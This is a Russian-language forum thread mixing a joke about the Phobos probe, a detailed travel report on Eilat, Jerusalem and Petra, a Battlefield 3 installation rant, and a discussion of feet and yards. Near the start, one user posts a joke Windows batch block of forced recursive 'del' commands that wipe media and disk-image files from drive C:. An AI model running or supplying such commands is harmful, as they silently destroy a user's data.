http://news.mail.ru/society/7436004/?frommail=1
Слышали, наверное, про эту историю с "Фобосом"...
Не нравится мне это, очень не нравится. Почему такие нехорошие аналоги с Думом возникают в нашей реальной действительности?
Shadowman
Мало кто помнит, но никак не могу отметить вот следующую статейку, аж февральскую этого года.
Правда, статья - полный бред.
Даже имп, что монстр - но со мной согласен.
А что касается аналогий с Думом, то вспоминается...хех...
C:
CD C:\
del /F /S /Q /A:-R-S-H *.avi
del /F /S /Q /A:-R-S-H *.mp3
del /F /S /Q /A:-R-S-H *.ogg
del /F /S /Q /A:-R-S-H *.wmv
del /F /S /Q /A:-R-S-H *.flv
del /F /S /Q /A:-R-S-H *.mp4
del /F /S /Q /A:-R-S-H *.fla
del /F /S /Q /A:-R-S-H *.flac
del /F /S /Q /A:-R-S-H *.iso
del /F /S /Q /A:-R-S-H *.mds
del /F /S /Q /A:-R-S-H *.mdf
del /F /S /Q /A:-R-S-H *.cue
del /F /S /Q /A:-R-S-H *.mkv
Правда, именно для диска C может не прокатить. Правда, форматирование даст ещё более быстрый и хороший результат, так как эти команды оставят после себя кучу неработоспособных программ.
Memfis
1. Пройтись по дискам и сложить на DVD все действительно невосстановимые файлы.
2. Вставить диск с Nimblex.
3. Перезагрузить ПК.
4. Меню -> Программы -> Менеджер файлов
5. Менеджер разделов жесткого диска -> Выбрать все разделы -> Очистить
6. Создание раздела -> NTFS -> Размер: 25% -> Имя: C:
7. Создание раздела -> NTFS -> Размер: незанятое -> Имя: D:
8. Вытащить диск, вставить установочный диск Windows, перезагрузить ПК.
9. Установить Windows в раздел C:.
Вернулся из Эйлата. Рассказываю ОЧЕНЬ кратко, ибо если все сразу, то наберется на несколько страниц. Если возникнет желание порасспрашивать поподробнее - welcome, как говорится. Фотки потом.
0) Значит, улетел я в воскресенье из Домодедово в аэропорт Овда, оттуда 40 мин до Эйлата. Прилетел сегодня где-то в 02.00, задержался на полтора часа, ибо израильская служба безопасности аэропорта завернула пару наших российских пассажиров с предыдущего рейса. Сказали: "Мы их не пустим, они проштрафились (в чем конкрерно - мне не ведомо), сами их забирайте, как - нам без разницы". Дело утряслось, им нашли место в нашем самолете, впоследствии их видили конвоируемыми (без наручников) службой безопасности уже нашего аэропорта. Видимо, сурово проштрафились. Черт меня дернул лететь в гриндерсах, а не сразу в кроссовках, до аэропорта всего пару шагов от автостоянки. Кроссовки пришлось покупать на месте. Еще эти гриндерсы предсказуемо звенели в металлодетекторе в Овде, пришлось снять .
1) Эйлат - самый южный город Израиля, расположет на берегу Акабского (Эйлатского) залива, очень древний и проч, проч... читать в Википедии. На 90% это курорт, остальное - исследование природы и небольшой порт. Температура воды там не опускается ниже 22 градусов, но тем не менее в конце ноября там очень прохладно: ночью вообще чуть больше 10-ти, днем чуть повыше 20-ти. А еще северный ветер. Поэтому купаться там было, так скажем, на любителя. Отельчик недорогой, на 2-ой линии, ****, all inclusive, питание однообразное, но вкусное. Еда кошерная: никакой свинины; мяса на завтрак нет, молочных продуктов на ужин - тоже.
Темнело в 5 вечера, зима, блин. Пляж вообще закрывался в 4. Так что свободные вечера я шлялся по сувенирам.
Цены в Израиле кусачие, московские, если покупать действительно вещь, а не сувениры. Валюта - шекель, вместо копеек - агорот. 3.5 NIS = 1$.
Так, что там у нас по экскурсиям.
2) Во вторник был Иерусалим с заездом в Вифлием. Ну тут вообще можно до бесконечности говорить, поэтому скажу что запомнилось больше всего.
Вифлием - палестинская территория, в городе проживает 3/4 мусульман. Вот так-то. На стенах я увидел портрет какой-то женщины с именем (имя забыл) и цифрой 2002, вокруг портреты поменьше. Гид сказал, что это террористы, которых так восхваляют местные.
Фотографировать в городах и храмах нам разрешали везде, кроме тех мест, где специально оговорено, например, Кувуклии.
Гид был бесподобен, выходец из Киева, эмигрировавший в Израиль, когда его ведомство расформировали в 1992 году. В Россию не рвется в том числе из-за бюррократии и чинуш, в Иерусалиме своя община. Рассказывал он без пафоса в стиле:
- После ареста Иисуса доставили к Ироду Антипе. Тот сказал ему: "Ну сотвори какое-нибудь чудо". Иисус ответил: "Не будет тебе никакого чуда". Ирод расстроился и отослал Иисуса обратно к Пилату.
В Храме Гроба Господня я наконец-то услышал орган, который почти полностью заглушил рассказ гида. Там же, на Голгофе, со мной случился жесточайший конфуз (тройной фейспалм) - ЗАЗВОНИЛ МОБИЛЬНИК, прямо во время службы! Секунд десять я вынимал его из кармана и выключал. Я вообще не думал, что кто-нибудь мне позвонит с работы, тем более во время отпуска, тем более вечером. Вероятность этого была действительно очень маленькая, мобильник я включил для своих (мамы с подругой), чтобы созвониться на крайняк, если совсем потеряемся (а потеряться в Старом городе можно элементарно).
У Стены плача я наконец увидел ортодоксальных иудеев, тех самых, с пейсами. 3/4 отведено мужчинам, оставшееся - женщинам. Молиться у иудеев мужчин, в отличие от женщин, не право, а обязанность.
3) В четверг мы поехали в Подводную обсерваторию, где провели полдня. Расположена она в 6 км от центра на восточном коралловом побережье. Сам комплекс небольшой, основная часть - бассейны и аквариумы с разного рода рыбами и черепахами. Сама обсербатория - круглое здание с тремя ярусами, оно мне очень понравилось. Верхний на высоте 20 м над уровнем моря - смотровая площадка, где видно северное побережье Эйлата, западное побережье и Акабу, бескрайнее море и корабли. Центральный ярус - с магазинами и рестораном. Наконец, нижний ярус расположен на глубине 6м под водой и представляет две комнаты со стеклянными стенками, вокруг которых плавают рыбки. Из аквариумов мне больше всех понравился тот, что с редкими рыбками.
4) В пятницу мы посещали Петру. Иорданский гид Амер был шикарен. Сама Петра - это длиннющее ущелье со стометровыми отвесными скалами, которое заканчивается площадью, справа от которой расположен проход к самому городу. В процессе посещения мною овладела мания безудержного фотографирования всех скал подряд. По самому городу нам так и не дали походить - было мало времени, а дорога назад до автобуса - это добрых 45 минут пешком. Хотя лазать там было есть где; говорят, что 80% города еще предстоит раскопать. Кстати, по каньону периодически носились ослы, лошади и верблюды, а то и целые повозки, которые могли неиллюзорно сбить зазевавшегося путешественника.
5) В субботу мы отправились на дельфиний риф, где понаблюдали за этими животными. Кстати, дельфины эти из Черного моря.
6) Отдельным пунктом выступает так называемый Эйлатский камень, который представляет собой смесь малахита и лазурита. Конкретный состав достаточно спорный (малахит, лазурит, азурит, хризоколла), важно, что это смесь и что встречается она в данной пропорции только в этом месте. Камешек, надо сказать, не дешевый; его обрамляют серебром, золотом и брильянтами. Добывают его в Тимне, в так называемых "копях царя Соломона" вместе с медью, кстати Тимна - это отдельная экскурсия. Сам он зеленовато-синий, обрабатывают его на специальной фабрике, экскурсия на которую входит в комплект путевки.
Надо сказать, что экскурсия эта - то еще разводилово, ее цель - кто бы сомневался - содрать с туристов бабла на посещении прифабричного магазина, где заламывают двойные цены. Так этот камень можно купить как в обычных магазинах, так и в Обсерватории и в Дельфинарии по божеским ценам (что мы и сделали).
Относительно продукции Мертвого моря - по-разному. Мама говорит, что например, аналогичный крем made in Israel можно купить и у нас в г Фрязино, в несколько раз дешевле (насчет качества, подделка или нет - не знаю).
Ломовые цены на сувениры и в аэропорте Овды, примерно в 2,5 раза дороже, чем в Эйлате. Маленький китайский плюшевый дельфинчик там стоит 75 NIS = 640 рублей!
Пару раз за день максимум. Плавал с маской, смотрел на рыбок, один раз даже видел крылатку, обплыл подальше, ибо ядовитая.
Увлекало так, что не замечал, что вода холодная. Но вот после того, как выходил, пронизывающий ветер казался по-настоящему ледяным.
Местные шекели мне показались какими-то разноцветными фантиками, хотя монета в 1/2 (именно 1/2) шекеля меня порадовала.
Иорданские динары мне показались более убедительными, тем более что один такой динарчик стоит как полтора бакса!
На бумажных банкнотах изображены иорданские короли, в том числе и действующий Абдалла II. Из монет наибольшее впечатление произвели граненые.
Кстати о баксах. В самолете прочел интересную заметку, посему они зеленые. Оказывается, давным-давно, когда типографиям заказывали их отпечатку, у них оказалось больше всего именно зеленой краски, вот так все тривиально.
О самолетах. Не стану скрывать, что я до усрачки боюсь летать. Хотя с закладыванием ушей у меня проблем не возникает, я чувствительно реагирую на всякого рода турбулентность. Может быть, на это повлияли СМИ, которые я смотрел в детстве и которые раздували очередную катастрофу как "Ах блин песец, конец света, Россея в опасносте, какстрашножить!" Так вот, видимо для нашего успокоения в самолете висел зомбоящик, который показывал основные параметры полета типа скорости, высоты, времени прибытия и проч. Иногда он показывал карту: летели мы через Украину, Турцию и Кипр, впрочем на обратном пути он карту не показывал, сцуко. Мили мне показались милее, чем черствые километры, не знаю, может быть их меньше, считать легче. Хотя высоту по-прежнему измеряют в десятках тысяч футов, нафига, когда есть ярды.
Как я баттлфилд 3 ставил...
Ну значит недавно лицуха была приобретена. Ну, думаю, заценю сейчас новую стрелялочку. Началось с того, что я узнал, что бф3 идет только под вин-7 или висту. Ну окей, создал отдельный раздел для новой ос и поставил ее. Впихнул диск с баттлом в дисковод и увидел менюшку состоящую из 1-й кнопки "установка". Ну жмякаю значит и вылазит мне установка какого-то "оригин". После установки эта штуковина обновлялась где-то минут 20(инет медленный). Затем начал ставиться баттлфилд. Поставился быстро(по сравнению с рейджем-то ). После этого я узнал, что к нему уже успели выпустить 800мб-патч. Ну, делать нечего - качаю. Скачал, установил. Врубаю баттл и внезапно узнаю, что игра запускается через браузер! Да еще и плагин какой-то скачать надо. Ну скачал. Жму "начать кампанию". Короче я был слегка расстроен сообщением об ошибке.
Скрытый текст:
НУ ПОЧЕМУ, БЛ@#$%, НЕЛЬЗЯ ПРОСТО УСТАНОВИТЬ ИГРУ И ЩЕЛКНУТЬ ПО ЕХЕШНИКУ???!!
Иорданские динары мне показались более убедительными, тем более что один такой динарчик стоит как полтора бакса!
До первой звезды, до первой звезды Пока есть нефть, можно танцевать!
Кстати, недавно из какого-то документального фильма услышал фразу, что большинство стран, богатых нефтью, имеют несчастливую судьбу, а граждане часто живут в злыднях (бедствуют). Так-то Россия не в счет, у нее свой неповторимый путь и душа по-крайней мере, над Россией пока не кружит хищный звездно-полосатый орел
Arsenikum :
Хотя высоту по-прежнему измеряют в десятках тысяч футов, нафига, когда есть ярды.
Действительно, согласен. Интересный факт - ярд в точности равен трём футам... (я сам до этого не знал, думал, это разные овощи совсем )
Фут = 0.3048 м, ярд = 0.9144 м.
А авиавысоту не меряют в ярдах потому наверное, что
wikipedia :
Было предпринято несколько попыток стандартизации величины ярда, таким образом в разное время ярд имел разную длину. Современный ярд является компромиссом между британским и американским стандартами и откалиброван с привязкой к метру.
Хотя... из первоисточников узнаем, когда это произошло:
Yard. In the 1893 Bulletin the yard was defined as: 1 yard = 3600/3937 meter, which results in the approximate relation: 1 yard=0.914 401 83 meter
Т.е. значение 0.9144 устаканилось еще в далеком 1893 г., на заре авиации... повлияло это или нет на принятие ярда как единицы измерения высоты, остается только гадать.